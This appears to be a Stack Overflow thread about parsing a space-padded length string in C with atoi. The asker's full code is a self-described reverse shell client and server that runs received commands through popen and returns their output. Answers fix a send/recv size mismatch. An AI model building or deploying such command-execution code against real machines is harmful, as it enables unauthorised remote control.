# How to turn string to integer in C with trailing whitespace (and without atoi)?

Tags: c, string, integer

I would like to convert a string to an integer, but the string will have a whitespace (maximum 9 characters). Here is an example of what I'm trying to do:

```
char* pointer = (char *) malloc(10);
int num = 10, newnum;
sprintf(pointer, "%10d", num);
//Convert pointer to integer here, assign it to newnum variable;
printf("New integer is: %d", newnum);
```

Output:

```
New integer is 10
```

I have tried using the `atoi` function but it is returning zero every time for some reason. If you need me to include the code in which it is returning zero, I'd be happy to do so, as this could very much be my error and not on the function. Here is the code (this is a reverse shell, so there is a client and a server, the problem is in the server, but it could be the client, I don't know): 
Server

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

#define PORT 4583


int main(){

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in server;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(PORT);
    server.sin_family = AF_INET;
    bind(sock, (struct sockaddr *) &server, sizeof(server));
    listen(sock, 2);
    int client = accept(sock, NULL, NULL);
    ssize_t size;
    int i, length;

    while (1){
        char * command = (char *) malloc(75);
        char * output = (char * ) malloc (10001);
        char* lengths = (char *) malloc(11);
        printf(">> ");
        fgets(command, 75, stdin);
        send(client, command, strlen(command), 0);
        recv(client, lengths, 11, 0);
        printf("Length: %s\n", lengths);
        length = atoi(lengths);
        printf("%d", length);
        recv(client, output, length+1, 0);
        printf("%s\n",  output);
        free(command);
        free(output);
        free(lengths);
    }
    return 0;
}
```

Client

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 4583

int main(){

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in server;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(PORT);
    server.sin_family = AF_INET;
    connect(sock, (struct sockaddr *) &server, sizeof(server));
    int commandlen;

    while (1){
        char* command = (char *) malloc(75);
        char* output = (char *) malloc (5000);
        recv(sock, command, 75, 0);
        commandlen = strlen(command);
        if (*command == 'c' && *(command+1) == 'd'){
            command[commandlen-1] = '\0';
            int stat = chdir(command+3);
            if (stat != 0){
                output = strerror(errno);
                send(sock, output, 5000, 0);
            }
        }else{
            char* fullmsg = (char *) malloc(10001);
            char* length = (char *) malloc(11);
            FILE * cmd = popen(command, "r");
            while (fgets(output, 5000, cmd) != NULL){
                strcpy(fullmsg+(strlen(fullmsg)), output);
            }
            sprintf(length, "%10zu", strlen(fullmsg));
            send(sock, length, 11, 0);
            send(sock, fullmsg, 10001, 0);
            pclose(cmd);
            free(length);
            free(fullmsg);
        }
        free(output);
        free(command);
    }
    return 0;
}
```

Comment: `if (sscanf (pointer, "%d", &num) == 1)` you have a good conversion from string to `int` in `num`. You can also use `strtol()` which provides many more diagnostics for the conversion. (but `pointer` must point to valid storage and contain a valid string of digits and whitespace)

Comment: simply use `"%d"` as the format. `%10d' enforces 10 characters. Also provide allocated memory to `pointer`... What is `newnum`?

Comment: `malloc(10)` -> `malloc(11)`

Comment: What do you mean by "trailing whitespace" ? The string has no trailing whitespace

Comment: "If you need me to include the code in which it is returning zero, I'd be happy to do so..." Please do that.

Comment: @4386427 added the full code. atoi func is in the server

Comment: What is the output of this line: `printf("Length: %s\n", lengths);`

Comment: @4386427 the first time I run it it's ```Length: ........17``` and the second time its blank (and it says that way forever) (not specifically 17 that was just an example)(stack didn't add the 8 spaces I added there so I replaced them with dots)

Comment: Try to print `length` on client side - what do you get?

Comment: @4386427 It printed 17 the first time and 303 the second (again, these numbers are made up)(Im assuming the problem is with the recv/send functions, but what is it?)

Comment: @4386427 just did. Thanks! upvoted and made official answer

Answer (score 1, accepted):

The problem is that the client sends more data than the server reads:

In client code:

```
send(sock, fullmsg, 10001, 0);
```

In server code:

```
recv(client, output, length+1, 0);
                     ^^^^^^^^
                     Less than 10001
```

The client should only send the valid bytes - something like:

```
send(sock, fullmsg, strlen(fullmsg) + 1, 0);
```

Answer (score 1):

There are many problems in your code. To start with, you did not point `pointer` to any valid memory, so attempt to write into the memory will invoke [undefined behaviour](https://en.wikipedia.org/wiki/Undefined_behavior). You must make the `pointer` point to a valid block of memory long enough to hold the final result.

That said, you should check for the return value of the function call (specially library functions) to ensure they are successful, before using the return value / buffers filled by them.

Comment: @DavidC.Rankin Side effects maybe.

Comment: The atoi function is returning 0... Why is that? (Btw I fixed the code)

Comment: @Serket what `atoi()`? that's the opposite case.

Comment: @SouravGhosh what do you mean?